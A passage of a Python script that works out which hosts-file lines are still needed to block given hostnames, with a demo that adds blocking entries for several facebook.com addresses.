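    """Return the hosts-file lines still needed to block every name given."""
    return [f"{sink} {h.lower()}" for h in hostnames
            if not is_blocked(h, table)]


if __name__ == "__main__":
    table = parse_hosts(SAMPLE_HOSTS)
    wanted = ["www.facebook.com", "facebook.com", "m.facebook.com"]
    for line in missing_entries(wanted, table):
        print("add:", line)
```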
